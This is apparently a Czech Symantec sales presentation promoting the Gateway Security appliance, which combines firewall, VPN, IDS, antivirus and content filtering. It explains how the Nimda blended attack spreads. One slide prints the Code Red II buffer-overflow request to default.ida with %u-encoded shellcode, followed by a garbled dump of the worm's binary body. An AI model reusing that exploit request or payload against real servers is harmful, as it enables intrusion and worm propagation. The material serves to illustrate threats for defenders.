Symantec Gateway Security Integrovaná bezpečnost brány Radek Smolík Symantec GmbH Česká republika a Slovenská republika
Polymorfické viry (Tequila) Kombinované hrozby (Code Red, Nimda, Klez) Denial-of-Service (Yahoo!, eBay) Mailové červy (Love Letter/Melissa) Zombie (Trin00) Zdroj: Symantec Security Response Viry Síťové útoky Evoluce hrozeb 70,000 60,000 50,000 40,000 30,000 20,000 10,000 Number of Known Threats
Jak útočí Nimda? GET / default. ida ?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xmlContent-length: 3379 ネネ ` ・ フ・ dg6 dg ・ 鞜 h 劫 \PU 恪・ PU ・燕 XU ・ 斑 = 版ヘカノ燕 T 丘 ×0 ・ ・ ヌ F0 ・ ・ CodeRedII ・ $U 、 Yj 劫 pPuU ーサ タ tK3 ロ U ・ 3' u? ヌ・ ヌ・ ヌ・ 畿 怨 d 劫 hPj 劫 `Pj jU 屠 Th~fuU 、 Y ・ u1 X- モ j h ・ P uU ャ = ・ uj j 劫 \PuU ィ uU エ鱸サ ゚ w ・ ・ xu サ ` ・ 掬 $dg ・ Xa ・ dg6 dg ・ f ・ MZ u 繼 K< ・ PE u ラ亀 x モ毅・ KERNu ナ- EL32u サ 3 ノ I 脚 A ュ・ GetPu|rocAu ・ JI ム・ J$ キチ・ J ・テ吋 $$dg ・ Xa テ鏖云・ E LoadLibraryA u ・ UE CreateThread u ・ UE GetTickCount u ・ UE ・ Sleep u ・ UE 韋 GetSystemDefaultLangID u ・ UE 蒻 GetSystemDirectoryA u ・ UE 琲 CopyFileA u ・ UE ワ・ GlobalFindAtomA u ・ UE リ・ GlobalAddAtomA u ・ UE ヤ・ CloseHandle u ・ UE ミ・ _lcreat u ・ UE フ・ _lwrite u ・ UE ネ・ _lclose u ・ UE ト・ GetSyste mTime u ・ UE タ・ WS2_32.DLL UE シ・ socket u シ UE ク・ closesocket u シ UE エ・ ioctlsocket u シ UE 、・ connect u シ UE ー・ select u シ UE ・ send u シ UE ャ・ recv u シ UE ィ・ gethostname u シ UE 懆 gethostbyname u シ UE 倩 WSAGetLastError u シ U 碑 USER32.DLL UE 占 ExitWindowsEx u ・ UE 右 ы ・ xV4 チタテ鞦 t6Ff×,,u217 ・ミ 5 ミ h jj U5 リ ・ テ ・・・・・・・・・ \EXPLORER.EXE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable ・ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC /C /D c:\,,217 d:\,,217 ・・・・・・・ ・・・・・ <0 ・ `0 L0 ・ p0 ・ ヲ 0 セ 0 ネ 0 ワ 0 ・ 0 ・ ヲ 0 セ 0 ネ 0 ワ 0 ・ 0 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExARegCloseKey ・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ^ ソケ j ・ d:\explorer.exe ・ $ ・ U フ・ tM 怨 L ャ旗 8>u'j ・ jV オ LU ネ FOu ナオ LU トテ 珒・・テ a ノツ
Ohrožení perimetru a jeho řešení Poštovní server Souborový server Pracovní stanice Internet Webový server Poštovní brána Pracovní stanice přes poštu Firewall Skanování Trojské útoky DDOS útoky IP spoofing útoky Sabotáže, krádeže Kompromitování webu W32 viry Makroviry Skripty Mobilní kód Síťové IDS Detekování útoků Varování, logování Blokování průniků Směrování a inspekce provozu Antivirová ochrana na GW, FSRV a WS Detekování a čištění souborů Blokování poštovních červů a mobilního kódu Hacker Cracker
Kombinovaný útok typu Nimda Červ dorazí elektronickou poštou: Červ dorazí elektronickou poštou: 1. Prosmekne se přes firewall jako poštovní zpráva 2. Použije zranitelnost MIME, aby se spustil pouze prohlédnutím zprávy 3. Infikovaný systém použije vlastní SMTP server červa, aby exportoval data a šířil červa na další systémy Firewall Internet Mail server Internet
Kombinovaný útok typu Nimda Kompromitovaný webový server: Kompromitovaný webový server: 1. Uživatel navštíví kompromitovaný webový server (v Internetu nebo Intranet) 2. Uživatel stahuje infikovaný soubor, který jako přílohu obsahuje červa, na svůj počítač a spouští jeho logiku přes zranitelné místo v MS Explorer Webový server přes webovou stránku Internet Pracovní stanice surfující na webu
Kombinovaný útok typu Nimda Neošetřená zranitelnost IIS serveru: Neošetřená zranitelnost IIS serveru: 1. Infikovaný systém skanuje IP adresy a hledá nepatchovaný IIS 2. Je použit Unicode Web Traversal, aby byla získána kontrola nad cílovým serverem 3. Vložené příkazy / zprávy vytváření pakety HTTP protokolu, které neodpovídají RFC a vedou k “Denial Of Service” útoku v odchozím směru Souborový server Poštovní server Internet DoS útoky Infikovaný systém Webový server
Kombinovaný útok typu Nimda Sdílení disků a souborů v rámci sítě: Sdílení disků a souborů v rámci sítě: 1. Nimda vyhledává pevné disky s povoleným sdílením adresářů a souborů 2. Vytváří „otevřenou síť“, zakládá účty „guest“ s právy administrátora, vytváří díry v bezpečnosti sítě Webový server Souborový server Internet Pracovní stanice Infikovaný systém Firewall
Jak zastavit kombinované útoky? Poštovní server Souborový server Pracovní stanice Internet Antivirus Firewall Detekce narušení Hodnocení zranitelnosti Webový server Poštovní brána Webový server přes web stránky Pracovní stanice přes poštu
Problémy jednotlivých produktů Potřeba vícerých technologií pro dosažení dostatečné hloubky obrany Potřeba vícerých technologií pro dosažení dostatečné hloubky obrany Nutnost pracovat s produkty různých, často zásadně se lišících výrobců Nutnost pracovat s produkty různých, často zásadně se lišících výrobců Problémy s podporou a různým stupněm znalostí Zvýšení složitosti správy navzájem nespolupracujících řešení Malá integrace mezi FW, IDS AV (vysoké náklady) Malá integrace mezi FW, IDS AV (vysoké náklady) Nižší bezpečnost než u integrovaného řešení, nesnadná správa Potřeba vícerých serverů a různých další HW komponent Potřeba vícerých serverů a různých další HW komponent Nákladná a obtížná řešení s delší dobou nasazení Nákladná a obtížná řešení s delší dobou nasazení Vysoké náklady na pořízení a integrované nasazení Problematická instalace a konfigurace (oddělené produkty) Nemožnost řízení z jednoho místa nebo podstatná omezení správy
Integrace je řešením
Symantec Gateway Security První produktové řešení v nové kategorii bezpečnosti pro úroveň gatewaye První produktové řešení v nové kategorii bezpečnosti pro úroveň gatewaye Nový přístup k řešení výzvy bezpečnosti korporativní gatewaye, schopné čelit současným i budoucím útokům Nový přístup k řešení výzvy bezpečnosti korporativní gatewaye, schopné čelit současným i budoucím útokům Poskytuje vše, co zákazník potřebuje pro síťovou bezpečnost (integrace, snadná instalace, spolehlivost) Poskytuje vše, co zákazník potřebuje pro síťovou bezpečnost (integrace, snadná instalace, spolehlivost) Stává se klíčovým produktem v bezpečnostní strategii společnosti Symantec Stává se klíčovým produktem v bezpečnostní strategii společnosti Symantec
SGS - Bezpečnost na „hraně“ sítě Mail server Uživatelé DB server FTP server Webové servery Internet Jeden box pro FW*, AV*, IDS*, VPN a CF Integrace a podpora od jediného dodavatele Jediná konzola pro centralizovanou správu Velmi nákladově efektivní řešení bezpečnosti * Integrovaná bezpečnost, odpovídající na kombinované hrozby na úrovni gatewaye a zabraňující průnikům, šíření a kompromitacím v obou směrech
SGS – Příklad nasazení Pobočková síť Privátní subnet Centrální síť Pobočkový server Webový server Poštovní server Souborový server Server financí Server HR Pracovní stanice Model 5310 (50, 100, 250) 2x model 5310 v clusteru (HA/LB) Internet Model 5310 (500)
Integrovaná technologie v akci Integrovaná víceúrovňová ochrana Integrovaná víceúrovňová ochrana Symantec Gateway Security Intrusion Detection Agent Firewall Engine Virus pro webový server Internet Virus Scanner
Integrovaná technologie v akci Intrusion Detection Agent Engine firewallu Antivirus VPN Filtrace obsahu Unscanned Data Bezpečná data Symantec Gateway Security Internet Poštovní server Souborový server Pracovní stanice Webový server Poštovní brána
Vzájemně provázané bezpečnostní funkce
Plně integrovaná konzola V jediné MMC konzole lze společně nastavovat firewall, VPN, IDS, antivirové funkce i filtrace obsahu V jediné MMC konzole lze společně nastavovat firewall, VPN, IDS, antivirové funkce i filtrace obsahu Vše lze provádět z jednoho místa a ve stejném rozhraní Vše lze provádět z jednoho místa a ve stejném rozhraní Je podporováno společné patchování a aktualizace Je podporováno společné patchování a aktualizace Doplňkově lze vzdáleně přistupovat k systému také přes terminál Doplňkově lze vzdáleně přistupovat k systému také přes terminál
Nastavení funkcí firewallu Firewallová komponenta produktu Symantec Gateway Security představuje plně inspekční, aplikační proxy firewall s schopností filtrovat provoz až na úrovni aplikačních protokolů Firewallová komponenta produktu Symantec Gateway Security představuje plně inspekční, aplikační proxy firewall s schopností filtrovat provoz až na úrovni aplikačních protokolů Škála proxy serverů, které má firewall k dispozici zajišťuje, že můžete bezpečně řešit i velmi pokročilé funkce, související s otevíráním systémů Škála proxy serverů, které má firewall k dispozici zajišťuje, že můžete bezpečně řešit i velmi pokročilé funkce, související s otevíráním systémů Firewall používá algoritmus „Best Fit“ pro správu pravidel Firewall používá algoritmus „Best Fit“ pro správu pravidel Jsou podporovány DNS, LDAP a také Out of Band autentikace Jsou podporovány DNS, LDAP a také Out of Band autentikace
Virtuální privátní sítě Symantec Gateway Security podporuje oba režimy práce s VPN, jak: Symantec Gateway Security podporuje oba režimy práce s VPN, jak: Site-to-Site VPN připojení, tak i Remote-to-Site VPN připojení Správa VPN je shodná jako správa firewallu a neprovádí se v samostatném prostředí Správa VPN je shodná jako správa firewallu a neprovádí se v samostatném prostředí VPN je přímo součást firewallu, který je také schopen ji vnitřně využívat (šifrovaný a tunelovaný provoz může být firewallem přímo kontrolován) VPN je přímo součást firewallu, který je také schopen ji vnitřně využívat (šifrovaný a tunelovaný provoz může být firewallem přímo kontrolován) VPN je spravována jako dílčí entita v rámci firewallových pravidel VPN je spravována jako dílčí entita v rámci firewallových pravidel Stejně jako pro firewall, tak i pro VPN je použit algoritmus „Best Fit“, který odstraňuje závislost na pořadí pravidel Stejně jako pro firewall, tak i pro VPN je použit algoritmus „Best Fit“, který odstraňuje závislost na pořadí pravidel
Detekce narušení sítě Funkce detekce narušení sítě je integrována do kernelu Funkce detekce narušení sítě je integrována do kernelu Detekce narušení sítě pracuje s atomickými signaturami Detekce narušení sítě pracuje s atomickými signaturami Signatury jsou pravidelně doplňovány a aktualizovány Signatury jsou pravidelně doplňovány a aktualizovány Detekce narušení může být nastavena jako probíhající před firewallem nebo uvnitř firewallu Detekce narušení může být nastavena jako probíhající před firewallem nebo uvnitř firewallu Pro rychlý přehled je k dispozici také separátní logování Pro rychlý přehled je k dispozici také separátní logování
Detekce probíhajícího útoku
Antivirová ochrana Symantec Gateway Security zahrnuje antivirovou kontrolu elektronické pošty a také webového provozu Symantec Gateway Security zahrnuje antivirovou kontrolu elektronické pošty a také webového provozu Antivirové funkce jsou založeny na antivirových agentech, jejichž funkce jsou vyvolány jednotlivými proxy servery při kontrole SMTP, HTTP a FTP protokolů na úrovni firewallu Antivirové funkce jsou založeny na antivirových agentech, jejichž funkce jsou vyvolány jednotlivými proxy servery při kontrole SMTP, HTTP a FTP protokolů na úrovni firewallu Antivirus je tak plně integrován do vstupní kontroly transakcí, které přicházejí do Vaší infrastruktury nebo s ní odcházejí ven Antivirus je tak plně integrován do vstupní kontroly transakcí, které přicházejí do Vaší infrastruktury nebo s ní odcházejí ven Běžné antivirové funkce jsou doplněny o možnost vytvářet slovníky proti SPAM poště, filtrace předmětů zpráv, velikostní limity pro zprávy a přílohy a filtrování příloh podle typů Běžné antivirové funkce jsou doplněny o možnost vytvářet slovníky proti SPAM poště, filtrace předmětů zpráv, velikostní limity pro zprávy a přílohy a filtrování příloh podle typů
Filtrování obsahu webu Filtrování webu je založeno na URL filtrech Filtrování webu je založeno na URL filtrech Databáze URL adres je kategorizována a aktualizována Databáze URL adres je kategorizována a aktualizována Je možné přidat vlastní URL nebo uvolnit již zahrnuté URL adresy Je možné přidat vlastní URL nebo uvolnit již zahrnuté URL adresy Lze filtrovat grafické mapy, aktivní grafiku, multimédia na stránkách apod. Lze filtrovat grafické mapy, aktivní grafiku, multimédia na stránkách apod. Filtrování zahrnuje také cgi dotazy a vyloučení známých zranitelných míst web serverů Filtrování zahrnuje také cgi dotazy a vyloučení známých zranitelných míst web serverů Podle nastavených pravidel lze uživateli stránku odmítnout (se záznamem v logu o nepovoleném přístupu) Podle nastavených pravidel lze uživateli stránku odmítnout (se záznamem v logu o nepovoleném přístupu)
Výhody licencování SGS 5310 Ne různé, ale jediný hardwarový model Ne různé, ale jediný hardwarový model Volitelný počet chráněných uživatelů Volitelný počet chráněných uživatelů 50, 100, 250, 500, neomezený (běžně až 4000) Rozšíření o integrovanou VPN – pouze klíč Rozšíření o integrovanou VPN – pouze klíč Kompletní roční aktualizace zahrnuta v ceně Kompletní roční aktualizace zahrnuta v ceně Zvýhodněný prodej clusterů (100, 250, neomezený) Zvýhodněný prodej clusterů (100, 250, neomezený) úspora při nákupu clusteru téměř 50%
Kontakty na český Symantec Radek Smolík National Sales Manager Symantec ČR a SR Praha City Center Klimentská , Praha Jakub Jiříček System Engineer Symantec ČR a SR Praha City Center Klimentská , Praha